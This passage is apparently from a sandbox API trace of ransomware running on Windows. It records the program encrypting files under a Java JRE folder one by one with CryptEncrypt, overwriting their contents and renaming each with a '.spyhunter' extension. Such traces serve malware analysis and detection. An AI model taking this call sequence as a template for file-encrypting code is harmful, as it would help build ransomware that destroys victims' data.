lpNumberOfBytesWritten=0x248e4b4*=0x4, lpOverlapped=0x0) returned 1 [0171.765] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4b4*=0x30, lpOverlapped=0x0) returned 1 [0171.765] CloseHandle (hObject=0xb0) returned 1 [0171.765] GetProcessHeap () returned 0x2c0000 [0171.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.765] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Juan.spyhunter") returned 80 [0171.765] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Juan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\san_juan"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\San_Juan.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\san_juan.spyhunter")) returned 1 [0171.798] GetProcessHeap () returned 0x2c0000 [0171.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.798] GetProcessHeap () returned 0x2c0000 [0171.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.798] GetProcessHeap () returned 0x2c0000 [0171.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7ce88 | out: hHeap=0x2c0000) returned 1 [0171.798] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4f8 | out: pbBuffer=0x248e4f8) returned 1 [0171.798] GetProcessHeap () returned 0x2c0000 [0171.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.798] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4f0*=0x30) returned 1 [0171.798] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Buenos_Aires" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\buenos_aires"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.799] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Buenos_Aires") returned 74 [0171.799] StrStrW (lpFirst="Buenos_Aires", lpSrch=".txt") returned 0x0 [0171.799] GetProcessHeap () returned 0x2c0000 [0171.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.799] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e4b4*=0x225, lpOverlapped=0x0) returned 1 [0171.800] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffddb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.800] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x225, lpNumberOfBytesWritten=0x248e4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e4b4*=0x225, lpOverlapped=0x0) returned 1 [0171.800] GetProcessHeap () returned 0x2c0000 [0171.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.800] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.800] WriteFile (in: hFile=0xb0, lpBuffer=0x248e4f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4b4, lpOverlapped=0x0 | out: lpBuffer=0x248e4f4*, lpNumberOfBytesWritten=0x248e4b4*=0x4, lpOverlapped=0x0) returned 1 [0171.800] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4b4*=0x30, lpOverlapped=0x0) returned 1 [0171.800] CloseHandle (hObject=0xb0) returned 1 [0171.800] GetProcessHeap () returned 0x2c0000 [0171.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.801] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Buenos_Aires.spyhunter") returned 84 [0171.801] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Buenos_Aires" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\buenos_aires"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Buenos_Aires.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\buenos_aires.spyhunter")) returned 1 [0171.802] GetProcessHeap () returned 0x2c0000 [0171.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.802] GetProcessHeap () returned 0x2c0000 [0171.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.802] GetProcessHeap () returned 0x2c0000 [0171.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4e10 | out: hHeap=0x2c0000) returned 1 [0171.802] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4f0 | out: pbBuffer=0x248e4f0) returned 1 [0171.802] GetProcessHeap () returned 0x2c0000 [0171.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.802] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4e8*=0x30) returned 1 [0171.802] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Antigua" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\antigua"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.803] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Antigua") returned 59 [0171.803] StrStrW (lpFirst="Antigua", lpSrch=".txt") returned 0x0 [0171.803] GetProcessHeap () returned 0x2c0000 [0171.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.803] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e4ac*=0x4d, lpOverlapped=0x0) returned 1 [0171.804] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.804] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x248e4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e4ac*=0x4d, lpOverlapped=0x0) returned 1 [0171.804] GetProcessHeap () returned 0x2c0000 [0171.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.804] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.804] WriteFile (in: hFile=0xb0, lpBuffer=0x248e4ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4ac, lpOverlapped=0x0 | out: lpBuffer=0x248e4ec*, lpNumberOfBytesWritten=0x248e4ac*=0x4, lpOverlapped=0x0) returned 1 [0171.804] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4ac*=0x30, lpOverlapped=0x0) returned 1 [0171.804] CloseHandle (hObject=0xb0) returned 1 [0171.804] GetProcessHeap () returned 0x2c0000 [0171.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.805] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Antigua.spyhunter") returned 69 [0171.805] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Antigua" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\antigua"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Antigua.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\antigua.spyhunter")) returned 1 [0171.805] GetProcessHeap () returned 0x2c0000 [0171.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.805] GetProcessHeap () returned 0x2c0000 [0171.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.805] GetProcessHeap () returned 0x2c0000 [0171.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e600c0 | out: hHeap=0x2c0000) returned 1 [0171.806] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4f0 | out: pbBuffer=0x248e4f0) returned 1 [0171.806] GetProcessHeap () returned 0x2c0000 [0171.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.806] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4e8*=0x30) returned 1 [0171.806] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anguilla" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\anguilla"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.807] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anguilla") returned 60 [0171.807] StrStrW (lpFirst="Anguilla", lpSrch=".txt") returned 0x0 [0171.807] GetProcessHeap () returned 0x2c0000 [0171.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.807] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e4ac*=0x41, lpOverlapped=0x0) returned 1 [0171.808] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.808] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x248e4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e4ac*=0x41, lpOverlapped=0x0) returned 1 [0171.808] GetProcessHeap () returned 0x2c0000 [0171.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.808] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.808] WriteFile (in: hFile=0xb0, lpBuffer=0x248e4ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4ac, lpOverlapped=0x0 | out: lpBuffer=0x248e4ec*, lpNumberOfBytesWritten=0x248e4ac*=0x4, lpOverlapped=0x0) returned 1 [0171.808] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4ac*=0x30, lpOverlapped=0x0) returned 1 [0171.808] CloseHandle (hObject=0xb0) returned 1 [0171.808] GetProcessHeap () returned 0x2c0000 [0171.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.808] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anguilla.spyhunter") returned 70 [0171.808] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anguilla" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\anguilla"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anguilla.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\anguilla.spyhunter")) returned 1 [0171.809] GetProcessHeap () returned 0x2c0000 [0171.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.809] GetProcessHeap () returned 0x2c0000 [0171.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0171.809] GetProcessHeap () returned 0x2c0000 [0171.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfdf8 | out: hHeap=0x2c0000) returned 1 [0171.809] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4e8 | out: pbBuffer=0x248e4e8) returned 1 [0171.810] GetProcessHeap () returned 0x2c0000 [0171.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0171.810] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4e0*=0x30) returned 1 [0171.810] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anchorage" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\anchorage"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0171.810] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anchorage") returned 61 [0171.810] StrStrW (lpFirst="Anchorage", lpSrch=".txt") returned 0x0 [0171.810] GetProcessHeap () returned 0x2c0000 [0171.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.810] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e4a4*=0x4c8, lpOverlapped=0x0) returned 1 [0172.194] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.194] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x4c8, lpNumberOfBytesWritten=0x248e4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e4a4*=0x4c8, lpOverlapped=0x0) returned 1 [0172.194] GetProcessHeap () returned 0x2c0000 [0172.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0172.194] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.194] WriteFile (in: hFile=0xb0, lpBuffer=0x248e4e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4a4, lpOverlapped=0x0 | out: lpBuffer=0x248e4e4*, lpNumberOfBytesWritten=0x248e4a4*=0x4, lpOverlapped=0x0) returned 1 [0172.194] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4a4*=0x30, lpOverlapped=0x0) returned 1 [0172.194] CloseHandle (hObject=0xb0) returned 1 [0172.194] GetProcessHeap () returned 0x2c0000 [0172.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.195] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anchorage.spyhunter") returned 71 [0172.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anchorage" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\anchorage"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anchorage.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\anchorage.spyhunter")) returned 1 [0172.196] GetProcessHeap () returned 0x2c0000 [0172.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.196] GetProcessHeap () returned 0x2c0000 [0172.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0172.196] GetProcessHeap () returned 0x2c0000 [0172.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfec0 | out: hHeap=0x2c0000) returned 1 [0172.196] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4e8 | out: pbBuffer=0x248e4e8) returned 1 [0172.196] GetProcessHeap () returned 0x2c0000 [0172.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0172.196] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4e0*=0x30) returned 1 [0172.196] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_ja.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0172.197] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ja.properties") returned 70 [0172.197] StrStrW (lpFirst="messages_ja.properties", lpSrch=".txt") returned 0x0 [0172.197] GetProcessHeap () returned 0x2c0000 [0172.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0172.197] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e4a4*=0x18cd, lpOverlapped=0x0) returned 1 [0172.633] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffe733, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.633] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x18cd, lpNumberOfBytesWritten=0x248e4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e4a4*=0x18cd, lpOverlapped=0x0) returned 1 [0172.634] GetProcessHeap () returned 0x2c0000 [0172.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0172.634] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.634] WriteFile (in: hFile=0xb0, lpBuffer=0x248e4e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e4a4, lpOverlapped=0x0 | out: lpBuffer=0x248e4e4*, lpNumberOfBytesWritten=0x248e4a4*=0x4, lpOverlapped=0x0) returned 1 [0172.634] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e4a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e4a4*=0x30, lpOverlapped=0x0) returned 1 [0172.634] CloseHandle (hObject=0xb0) returned 1 [0172.634] GetProcessHeap () returned 0x2c0000 [0172.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.634] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ja.properties.spyhunter") returned 80 [0172.634] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_ja.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ja.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_ja.properties.spyhunter")) returned 1 [0172.635] GetProcessHeap () returned 0x2c0000 [0172.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.635] GetProcessHeap () returned 0x2c0000 [0172.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0172.635] GetProcessHeap () returned 0x2c0000 [0172.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7c978 | out: hHeap=0x2c0000) returned 1 [0172.635] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4e0 | out: pbBuffer=0x248e4e0) returned 1 [0172.635] GetProcessHeap () returned 0x2c0000 [0172.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0172.636] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4d8*=0x30) returned 1 [0172.636] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\srgb.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0172.637] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\sRGB.pf") returned 52 [0172.637] StrStrW (lpFirst="sRGB.pf", lpSrch=".txt") returned 0x0 [0172.637] GetProcessHeap () returned 0x2c0000 [0172.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0172.637] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e49c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e49c*=0xc48, lpOverlapped=0x0) returned 1 [0172.881] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff3b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.881] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xc48, lpNumberOfBytesWritten=0x248e49c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e49c*=0xc48, lpOverlapped=0x0) returned 1 [0172.881] GetProcessHeap () returned 0x2c0000 [0172.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0172.882] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.882] WriteFile (in: hFile=0xb0, lpBuffer=0x248e4dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e49c, lpOverlapped=0x0 | out: lpBuffer=0x248e4dc*, lpNumberOfBytesWritten=0x248e49c*=0x4, lpOverlapped=0x0) returned 1 [0172.883] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e49c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e49c*=0x30, lpOverlapped=0x0) returned 1 [0172.883] CloseHandle (hObject=0xb0) returned 1 [0172.883] GetProcessHeap () returned 0x2c0000 [0172.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.884] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\sRGB.pf.spyhunter") returned 62 [0172.884] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\srgb.pf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\sRGB.pf.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\srgb.pf.spyhunter")) returned 1 [0172.887] GetProcessHeap () returned 0x2c0000 [0172.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.887] GetProcessHeap () returned 0x2c0000 [0172.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0172.888] GetProcessHeap () returned 0x2c0000 [0172.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed39e8 | out: hHeap=0x2c0000) returned 1 [0172.888] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4e0 | out: pbBuffer=0x248e4e0) returned 1 [0172.888] GetProcessHeap () returned 0x2c0000 [0172.888] 